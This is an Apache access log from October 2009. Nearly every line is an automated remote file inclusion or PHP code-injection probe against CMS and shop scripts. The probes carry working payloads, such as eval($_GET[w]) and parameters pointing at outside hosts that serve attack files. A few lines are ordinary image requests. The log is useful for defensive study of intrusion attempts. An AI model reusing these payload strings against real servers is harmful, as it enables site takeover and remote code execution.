77.242.37.212 - - [06/Oct/2009:03:35:31 -0400] "GET /logs/access_log.Q109053100%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
77.242.37.212 - - [06/Oct/2009:03:35:31 -0400] "GET /logs/access_log.Q109053100%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
77.242.37.212 - - [06/Oct/2009:03:35:31 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 200 20721 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:03:35:32 -0400] "GET /logs/access_log.Q109092000%20%20//adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:03:35:32 -0400] "GET /logs//adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:03:35:32 -0400] "GET /logs/access_log.Q109080400%20%20//adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:03:35:32 -0400] "GET //adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:03:35:35 -0400] "GET /logs//adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:03:35:35 -0400] "GET //adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:03:35:35 -0400] "GET /logs/access_log.Q109080400%20%20//adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:03:35:35 -0400] "GET /logs/access_log.Q109092000%20%20//adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:03:35:37 -0400] "GET //adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:03:35:37 -0400] "GET /logs/access_log.Q109080400//adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:03:35:37 -0400] "GET /logs//adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:03:35:37 -0400] "GET /logs/access_log.Q109092000//adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
77.242.37.212 - - [06/Oct/2009:03:35:40 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
77.242.37.212 - - [06/Oct/2009:03:35:40 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 200 20721 "-" "Mozilla/5.0"
77.242.37.212 - - [06/Oct/2009:03:35:45 -0400] "GET /logs/access_log.Q109053100%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
222.236.47.23 - - [06/Oct/2009:03:35:46 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
222.236.47.23 - - [06/Oct/2009:03:35:46 -0400] "GET /logs/access_log.Q109052800%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
222.236.47.23 - - [06/Oct/2009:03:35:46 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 20721 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:03:35:51 -0400] "GET //adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:03:35:51 -0400] "GET /logs/access_log.Q109092000%20%20//adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:03:35:51 -0400] "GET /logs/access_log.Q109080400%20%20//adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:03:35:51 -0400] "GET /logs//adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
64.27.9.117 - - [06/Oct/2009:03:35:56 -0400] "GET //include/write.php?dir=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
64.27.9.117 - - [06/Oct/2009:03:35:56 -0400] "GET /logs//include/write.php?dir=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
64.27.9.117 - - [06/Oct/2009:03:35:56 -0400] "GET /logs/access_log.Q109080800%20%20//include/write.php?dir=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
222.236.47.23 - - [06/Oct/2009:03:35:56 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
222.236.47.23 - - [06/Oct/2009:03:35:56 -0400] "GET /logs/access_log.Q109052800%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
222.236.47.23 - - [06/Oct/2009:03:35:56 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 20721 "-" "Mozilla/5.0"
222.236.47.23 - - [06/Oct/2009:03:35:58 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
222.236.47.23 - - [06/Oct/2009:03:35:58 -0400] "GET /logs/access_log.Q109053100////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
222.236.47.23 - - [06/Oct/2009:03:35:58 -0400] "GET /logs/access_log.Q109053100%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
222.236.47.23 - - [06/Oct/2009:03:35:58 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 20721 "-" "Mozilla/5.0"
222.236.47.23 - - [06/Oct/2009:03:35:59 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
222.236.47.23 - - [06/Oct/2009:03:35:59 -0400] "GET /logs/access_log.Q109052800%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
64.27.9.117 - - [06/Oct/2009:03:36:00 -0400] "GET /logs/access_log.Q109072200%20%20//include/write.php?dir=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
222.236.47.23 - - [06/Oct/2009:03:36:00 -0400] "GET /logs/access_log.Q109053100////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
222.236.47.23 - - [06/Oct/2009:03:36:00 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
64.150.183.219 - - [06/Oct/2009:03:36:00 -0400] "GET /logs/access_log.Q109062100//doceboCms/class/class.dashboard_cms.php?where_framework=http://bizadmin.hongik.ac.kr/bbs/data/__zbSessionTMP/fx29id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
222.236.47.23 - - [06/Oct/2009:03:36:00 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 20721 "-" "Mozilla/5.0"
222.236.47.23 - - [06/Oct/2009:03:36:02 -0400] "GET /logs/access_log.Q109052800%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
222.236.47.23 - - [06/Oct/2009:03:36:02 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
222.236.47.23 - - [06/Oct/2009:03:36:02 -0400] "GET /logs/access_log.Q109052800%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
222.236.47.23 - - [06/Oct/2009:03:36:02 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
222.236.47.23 - - [06/Oct/2009:03:36:02 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 20721 "-" "Mozilla/5.0"
222.236.47.23 - - [06/Oct/2009:03:36:02 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 20721 "-" "Mozilla/5.0"
222.236.47.23 - - [06/Oct/2009:03:36:02 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 20721 "-" "Mozilla/5.0"
222.236.47.23 - - [06/Oct/2009:03:36:06 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
222.236.47.23 - - [06/Oct/2009:03:36:06 -0400] "GET /logs/access_log.Q109053100////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
222.236.47.23 - - [06/Oct/2009:03:36:06 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 20721 "-" "Mozilla/5.0"
222.236.47.23 - - [06/Oct/2009:03:36:10 -0400] "GET /logs/access_log.Q109052800////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
222.236.47.23 - - [06/Oct/2009:03:36:11 -0400] "GET /logs/access_log.Q109053100%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
222.236.47.23 - - [06/Oct/2009:03:36:12 -0400] "GET /logs/access_log.Q109052800////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:03:36:13 -0400] "GET //secpay.inc.php?config[root_dir]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:03:36:13 -0400] "GET /logs//secpay.inc.php?config[root_dir]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:03:36:13 -0400] "GET /logs/access_log.Q109060500%20%20//secpay.inc.php?config[root_dir]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:03:36:13 -0400] "GET /logs//secpay.inc.php?config[root_dir]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:03:36:13 -0400] "GET /logs/access_log.Q109060500%20%20//secpay.inc.php?config[root_dir]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:03:36:13 -0400] "GET //secpay.inc.php?config[root_dir]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
98.164.198.14 - - [06/Oct/2009:03:36:13 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/seminars.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; yie8)"
98.164.198.14 - - [06/Oct/2009:03:36:13 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/seminars.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; yie8)"
222.236.47.23 - - [06/Oct/2009:03:36:14 -0400] "GET /logs/access_log.Q109053100%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:03:36:14 -0400] "GET //secpay.inc.php?config[root_dir]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:03:36:14 -0400] "GET /logs/access_log.Q109060500%20%20//secpay.inc.php?config[root_dir]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:03:36:14 -0400] "GET /logs//secpay.inc.php?config[root_dir]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
222.236.47.23 - - [06/Oct/2009:03:36:16 -0400] "GET /logs/access_log.Q109052800////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:03:36:16 -0400] "GET //secpay.inc.php?config[root_dir]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:03:36:16 -0400] "GET /logs/access_log.Q109060500%20%20//secpay.inc.php?config[root_dir]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:03:36:16 -0400] "GET /logs//secpay.inc.php?config[root_dir]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
77.242.37.212 - - [06/Oct/2009:03:36:18 -0400] "GET /logs/access_log.Q109052800%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
222.236.47.23 - - [06/Oct/2009:03:36:20 -0400] "GET /logs/access_log.Q109053100%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
222.236.47.23 - - [06/Oct/2009:03:36:20 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
64.150.183.219 - - [06/Oct/2009:03:36:20 -0400] "GET /logs/access_log.Q109051600//doceboCms/class/class.dashboard_cms.php?where_framework=http://bizadmin.hongik.ac.kr/bbs/data/__zbSessionTMP/fx29id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
222.236.47.23 - - [06/Oct/2009:03:36:20 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 20721 "-" "Mozilla/5.0"
222.236.47.23 - - [06/Oct/2009:03:36:21 -0400] "GET /logs/access_log.Q109053100%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
77.242.37.212 - - [06/Oct/2009:03:36:22 -0400] "GET /logs/access_log.Q109052800%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
222.236.47.23 - - [06/Oct/2009:03:36:25 -0400] "GET /logs/access_log.Q109053100////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
77.242.37.212 - - [06/Oct/2009:03:36:27 -0400] "GET /logs/access_log.Q109052800%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
77.242.37.212 - - [06/Oct/2009:03:36:34 -0400] "GET /logs/access_log.Q109052800%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
222.236.47.23 - - [06/Oct/2009:03:36:35 -0400] "GET /logs/access_log.Q109052800////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:03:36:40 -0400] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://pseuc0de.fileave.com/zfxid1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:03:36:40 -0400] "GET /logs/access_log.Q109082500%20%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://pseuc0de.fileave.com/zfxid1.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:03:36:40 -0400] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://pseuc0de.fileave.com/zfxid1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:03:36:41 -0400] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://pseuc0de.fileave.com/zfxid1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:03:36:41 -0400] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://pseuc0de.fileave.com/zfxid1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:03:36:41 -0400] "GET /logs/access_log.Q109082500%20%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://pseuc0de.fileave.com/zfxid1.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:03:36:41 -0400] "GET /logs/error_log.Q109060500%20%20//secpay.inc.php?config[root_dir]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:03:36:44 -0400] "GET /logs/error_log.Q109060500%20%20//secpay.inc.php?config[root_dir]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:03:36:46 -0400] "GET /logs/error_log.Q109060500%20%20//secpay.inc.php?config[root_dir]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:03:36:49 -0400] "GET /logs/error_log.Q109060500%20%20//secpay.inc.php?config[root_dir]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
211.115.89.97 - - [06/Oct/2009:03:36:50 -0400] "GET /logs/access_log.Q109080400//adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.hotlinkfiles.com/files/2380695_oajch/IDtest.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
211.115.89.97 - - [06/Oct/2009:03:36:50 -0400] "GET /logs//adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.hotlinkfiles.com/files/2380695_oajch/IDtest.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
83.138.48.14 - - [06/Oct/2009:03:36:50 -0400] "GET /logs/access_log.Q109062900%20%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://pseuc0de.fileave.com/zfxid1.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
211.115.89.97 - - [06/Oct/2009:03:36:51 -0400] "GET //adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.hotlinkfiles.com/files/2380695_oajch/IDtest.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
83.138.48.14 - - [06/Oct/2009:03:36:52 -0400] "GET /logs/access_log.Q109062900%20%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://pseuc0de.fileave.com/zfxid1.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
211.115.89.97 - - [06/Oct/2009:03:36:52 -0400] "GET /logs/access_log.Q109092000//adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.hotlinkfiles.com/files/2380695_oajch/IDtest.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
115.68.22.76 - - [06/Oct/2009:03:36:52 -0400] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.learncarego.org/language/english/copyright.txt???? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
115.68.22.76 - - [06/Oct/2009:03:36:53 -0400] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.learncarego.org/language/english/copyright.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
115.68.22.76 - - [06/Oct/2009:03:36:53 -0400] "GET /logs/access_log.Q109081500%20%20//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.learncarego.org/language/english/copyright.txt???? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
115.68.22.76 - - [06/Oct/2009:03:36:57 -0400] "GET /logs/access_log.Q109092200%20%20//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.learncarego.org/language/english/copyright.txt???? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
98.164.198.14 - - [06/Oct/2009:03:36:59 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/seminars.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; yie8)"
98.164.198.14 - - [06/Oct/2009:03:36:59 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/seminars.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; yie8)"
211.115.89.97 - - [06/Oct/2009:03:37:21 -0400] "GET //adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.hotlinkfiles.com/files/2380695_oajch/IDtest.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
211.115.89.97 - - [06/Oct/2009:03:37:21 -0400] "GET /logs/access_log.Q109080400//adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.hotlinkfiles.com/files/2380695_oajch/IDtest.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
